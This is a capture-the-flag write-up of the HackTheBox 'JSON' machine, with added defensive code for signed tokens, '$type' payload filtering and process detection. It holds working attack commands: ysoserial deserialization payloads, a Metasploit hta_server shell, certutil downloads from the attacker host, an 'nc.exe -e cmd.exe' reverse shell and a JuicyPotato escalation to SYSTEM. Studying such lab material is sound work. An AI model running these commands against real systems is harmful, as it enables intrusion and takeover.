Hackthebox - Retired - JSON
Recon
As always, I start with a simple up/down scan of all TCP ports as the first stage of a staged scan.
nmap -T4 -p- -oX ./nmapb.xml 10.10.10.158
Then I convert the output to HTML
# xsltproc ./nmapb.xml -o ./nmapb.html
That's a lot of open ports.
Let's scan just those ports with the -A switch to fingerprint the OS and services.
# nmap -T4 -p21,80,135,139,445,5985,47001,49152,49153,49154,49155,49156,49157,4915 -A -oX ./nmapf.xml 10.10.10.158
Then convert that to HTML
# xsltproc ./nmapf.xml -o ./nmapf.html
Looks like we've got a Windows box with FileZilla FTP on 21, IIS on 80 and NetBIOS/SMB, with RPC on 5985.
Let's start poking around.
SMB is open but there are no shares for anonymous.
Same story for FTP.
At least 80 is open: there is a page displayed briefly, then it redirects to this login page.
Same old song for RPC.
Dirb found:
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Jan 30 21:54:09 2020
URL_BASE: http://10.10.10.158/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.158/ ----
==> DIRECTORY: http://10.10.10.158/css/
==> DIRECTORY: http://10.10.10.158/files/
==> DIRECTORY: http://10.10.10.158/img/
+ http://10.10.10.158/index.html (CODE:200|SIZE:40163)
==> DIRECTORY: http://10.10.10.158/js/
==> DIRECTORY: http://10.10.10.158/views/
---- Entering directory: http://10.10.10.158/css/ ----
---- Entering directory: http://10.10.10.158/files/ ----
---- Entering directory: http://10.10.10.158/img/ ----
==> DIRECTORY: http://10.10.10.158/img/companies/
---- Entering directory: http://10.10.10.158/js/ ----
---- Entering directory: http://10.10.10.158/views/ ----
---- Entering directory: http://10.10.10.158/img/companies/ ----
DirBuster found this password.txt file.
It also found:
/api/token
/api/account
Exploit
So guess what the login creds for the website are?
admin/admin
But more importantly, we caught this in Burp:
eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0=;
Let's unpack that base64
# echo "eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0=" | base64 -d
{"Id":1,"UserName":"admin","Password":"21232f297a57a5a743894a0e4a801fc3","Name":"User Admin HTB","Rol":"Administrator"}
Username: admin
Password: 21232f297a57a5a743894a0e4a801fc3
Cool, so after we auth correctly we get back a cookie that saves our auth session for us.
I tried going to json.htb/api/account (which we found earlier) in the browser and caught this in Burp:
If I repeat this same request in Burp Suite's Repeater, we get some JSON-looking data back.
So we have a new header present, named Bearer, carrying the same base64-encoded value as our cookie. This looks like a call into the API that we can hopefully leverage.
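As an added illustration (not the post's or the app's code): the cookie above is just base64 of a JSON object, so anything that can read it can also rewrite it, and it even ships the password hash to the client. The signed-token functions below are an assumed hardened design for comparison; the key is a constructed placeholder.

```python
import base64
import hashlib
import hmac
import json

# The session cookie captured on the page: base64 of a JSON object, nothing else.
PAGE_COOKIE = "eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0="


def decode_cookie(token: str) -> dict:
    """Decode the app's cookie exactly as the page did: no signature, no expiry to check."""
    return json.loads(base64.b64decode(token))


def hash_matches(password: str, digest: str) -> bool:
    """True if digest is the unsalted MD5 of password (the format the cookie carries)."""
    return hashlib.md5(password.encode()).hexdigest() == digest


# Assumed hardened design (not the app's code): store only an opaque identity claim,
# sign it with a server-side key, and verify with a constant-time comparison.
def _b64(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).decode()


def issue_token(claims: dict, key: bytes) -> str:
    body = _b64(json.dumps(claims, sort_keys=True).encode())
    sig = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    return body + "." + sig


def verify_token(token: str, key: bytes):
    """Return the claims if the signature checks out, otherwise None."""
    body, _, sig = token.partition(".")
    if not sig:
        return None
    expected = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, sig):
        return None
    return json.loads(base64.urlsafe_b64decode(body))


def edit_claim_unsigned(token: str, field: str, value) -> str:
    """Rewrite one claim but keep the old signature: what the plain cookie silently permits."""
    body, _, sig = token.partition(".")
    claims = json.loads(base64.urlsafe_b64decode(body))
    claims[field] = value
    return _b64(json.dumps(claims, sort_keys=True).encode()) + "." + sig


if __name__ == "__main__":
    fields = decode_cookie(PAGE_COOKIE)
    print(fields["UserName"], fields["Rol"], hash_matches("admin", fields["Password"]))
    key = b"constructed-server-secret"  # placeholder; a real key is generated and kept server-side
    good = issue_token({"Id": fields["Id"], "Rol": "User"}, key)
    print(verify_token(good, key), verify_token(edit_claim_unsigned(good, "Rol", "Administrator"), key))
```

The unsigned cookie decodes to the admin's MD5 hash and role; with the signed variant, the same one-field edit is rejected because the signature no longer matches.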
So now let's see if this is vulnerable to a deserialization attack.
Here is a write-up about deserialization
The idea with JSON is that you can send and receive data in a specified format. What we are hoping here is that the web app deserializes this data without sanitizing or checking it first, which we can use to get RCE on the box.
There were some talks at Black Hat a while back focusing on this attack vector.
I found a tool that will format our commands and base64 encode them so we can send a GET request to the web app and hope that it runs our code for us.
This is a Windows exe, so I had to fire up a Windows VM and build the app from source using Visual Studio.
Now that we have the exe, let's see what we can do with it.
I just want to start with a PoC to see if I can get the box to ping my VPN IP.
There are 11 different gadgets we can use in the tool to generate our payload.
The first thing I did was write a little batch script to generate each of the payloads for me and load them into Burp to see if we get anything back.
ysoserial.exe -f BinaryFormatter -g ObjectDataProvider -c "ping 10.10.14.25" -o base64
My batch script generated the payloads with the BinaryFormatter, since all the gadgets can use that formatter. I also base64 encoded them so I could just copy and paste into Burp.
Let's set our machine to listen for incoming pings:
tcpdump -i tun0 -n icmp
This command basically says: listen on my tun0 interface and only show me ICMP packets.
So in Repeater, I just copied the outputs from ysoserial into the Bearer header, hit send, and waited to see if I got any pings.
Here is what the first payload looked like:
I tried all 10 (one of them required an input file).
No love.
Looking through the other available formatters that the gadgets can use, one stood out pretty quickly (don't know why I didn't see it before).
Json.Net. We are working with JSON, so let's try that one.
Only 3 of the gadgets could use this formatter:
ObjectDataProvider
WindowsClaimsIdentity
WindowsIdentity
So I generated a new JSON payload for all three of these gadgets and tried them.
The last one is WindowsIdentity...
Well, we finally got some love.
Yay!!!
OK, looks like we can use this deserialization attack to hopefully get somewhere on this box.
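An added detection example, not from the post or the tool it uses: Json.Net only instantiates caller-chosen types when the app enables TypeNameHandling and the input carries a "$type" member, so a Bearer token that contains one is a deserialization payload rather than a session claim and can be rejected before it reaches the deserializer. The payload sample and its type names below are constructed placeholders, not a real gadget chain.

```python
import base64, binascii, json, re

# Json.Net treats a "$type" member as an instruction to instantiate that .NET type (only
# when the app enables TypeNameHandling), so a session token should never contain one.
TYPE_KEY = "$type"
# Json.Net also accepts single-quoted JSON, which json.loads rejects; scan that form too.
_LOOSE_TYPE = re.compile(r"""['"]\$type['"]\s*:\s*['"]([^'"]*)['"]""")


def to_b64(text: str) -> str:
    """Encode text the way the app's tokens are encoded (standard base64)."""
    return base64.b64encode(text.encode()).decode()


def decode_token(token: str):
    """Decode the base64 value carried in the Bearer header; None if it is not valid base64."""
    try:
        return base64.b64decode(token.strip(), validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def find_type_names(obj) -> list:
    """Recursively collect every $type value, including ones in nested objects and arrays."""
    if isinstance(obj, dict):
        own = [str(obj[TYPE_KEY])] if TYPE_KEY in obj else []
        return own + [t for v in obj.values() for t in find_type_names(v)]
    if isinstance(obj, list):
        return [t for v in obj for t in find_type_names(v)]
    return []


def inspect_bearer(token: str) -> dict:
    """Allow plain session claims; reject anything carrying a type-name directive."""
    text = decode_token(token)
    if text is None:
        return {"verdict": "reject", "reason": "not base64", "types": []}
    try:
        types = find_type_names(json.loads(text))
    except json.JSONDecodeError:
        types = _LOOSE_TYPE.findall(text)  # loose (single-quoted) JSON still gets scanned
        if not types:
            return {"verdict": "reject", "reason": "not JSON", "types": []}
    if types:
        return {"verdict": "reject", "reason": "$type directive", "types": types}
    return {"verdict": "allow", "reason": "", "types": []}


# Constructed samples: the page's own cookie, and a made-up loose-JSON payload whose
# type names are placeholders, not a real gadget chain.
PAGE_TOKEN = "eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0="
CONSTRUCTED_PAYLOAD = to_b64("{'$type':'Example.Gadget, ExampleAssembly', "
                             "'Inner':{'$type':'Example.Nested, ExampleAssembly'}}")
```

On the .NET side the matching fix is to leave Json.Net's TypeNameHandling at None, so a "$type" member is never honoured in the first place; this filter is a second line of defence that also gives you a log line when someone tries.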
Alright, let's use mshta to get us a shell.
First we need to set up our msfconsole:
msfconsole
use exploit/windows/misc/hta_server
Let's check our options
Let's set srvhost to our VPN IP
set srvhost 10.10.14.25
I have a feeling this is x64, so let's see what options we have for target.
We want to change this to x64:
set target 1
And let's run.
OK, there is an lhost we need to set too; one of these days I'll learn how to check this before I execute.
set lhost 10.10.14.25
run
Oi, our port is still in use somewhere else, let's change that too:
set lport 4445
Will it run now?
Happy dance!!!
We got a shell
sessions 1
Let's get that user.txt file
Let's escalate
My plan is to use JuicyPotato and netcat to get a privileged shell back.
First let's serve up potato.exe and nc.exe to the json.htb box:
# python -m SimpleHTTPServer 8888
This is run from my payloads directory, which contains both juicypotato.exe and nc.exe.
Then we use certutil to download the files to the tmp directory on json.htb:
C:\tmp>certutil -urlcache -split -f http://10.10.14.25:8888/netcat/nc.exe nc.exe
C:\tmp>certutil -urlcache -split -f http://10.10.14.25:8888/juicypotato.exe potato.exe
Now on json.htb I'll make a new .bat file that calls back a reverse shell to my attacking machine using nc.exe:
C:\tmp>echo C:\tmp\nc.exe -e cmd.exe 10.10.14.25 4445 > revshell.bat
Let's set up our nc listener on our attacking machine to grab this connection when we execute on json.htb.
Now let's launch potato and have it use the new revshell.bat to escalate:
C:\tmp>potato.exe -p C:\tmp\revshell.bat -l 4445 -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334}
Looks like it worked. Let's check our nc listener to see if we have the connection.
And what user are we now? It should be SYSTEM according to the potato output.
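An added detection example (not part of the post), written from the other side of this procedure: the certutil download, the nc.exe -e callback and a shell spawned by the IIS worker (which is where the deserialized ping came from) are all cheap to spot in process-creation telemetry. The event lines and their pipe-delimited image|parent|commandline layout are constructed for this example, not real logs from the box.

```python
import re

# Constructed process-creation events (image|parent image|command line), shaped after
# the steps on this page; not real telemetry from the box.
EVENTS = [
    "C:\\Windows\\System32\\certutil.exe|C:\\Windows\\System32\\cmd.exe|certutil -urlcache -split -f http://10.10.14.25:8888/netcat/nc.exe nc.exe",
    "C:\\tmp\\nc.exe|C:\\Windows\\System32\\cmd.exe|C:\\tmp\\nc.exe -e cmd.exe 10.10.14.25 4445",
    "C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\inetsrv\\w3wp.exe|cmd.exe /c ping 10.10.14.25",
    "C:\\Windows\\System32\\certutil.exe|C:\\Windows\\System32\\cmd.exe|certutil -hashfile C:\\tmp\\potato.exe SHA256",
]
_URL = re.compile(r"https?://\S+", re.I)
SHELLS = ("cmd.exe", "powershell.exe")


def classify(event: str) -> list:
    """Return the rule names an event trips (empty list for benign activity)."""
    image, parent, cmdline = event.split("|", 2)
    exe = image.rsplit("\\", 1)[-1].lower()
    parent_exe = parent.rsplit("\\", 1)[-1].lower()
    args = cmdline.lower().split()
    hits = []
    # certutil fetching from a URL is the LOLBin download used on this page; a plain
    # -hashfile run (last sample) must not trip it.
    if exe == "certutil.exe" and "-urlcache" in args and _URL.search(cmdline):
        hits.append("certutil used as a downloader")
    # nc-style "-e <shell>" hands a shell to the remote end.
    if "-e" in args and any(a.endswith(SHELLS) for a in args):
        hits.append("netcat-style reverse shell (-e)")
    # The IIS worker process has no business launching a shell; a deserialization
    # payload that runs a command shows up exactly like this.
    if parent_exe == "w3wp.exe" and exe in SHELLS:
        hits.append("IIS worker spawned a shell")
    return hits


def scan(events) -> dict:
    """Map event index -> rule hits, keeping only events that tripped something."""
    results = {i: classify(e) for i, e in enumerate(events)}
    return {i: hits for i, hits in results.items() if hits}


if __name__ == "__main__":
    for i, hits in scan(EVENTS).items():
        print(i, hits)
```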
Let's get that root hash now
C:\Users\superadmin\Desktop>type root.txt
type root.txt
3cc8*****************************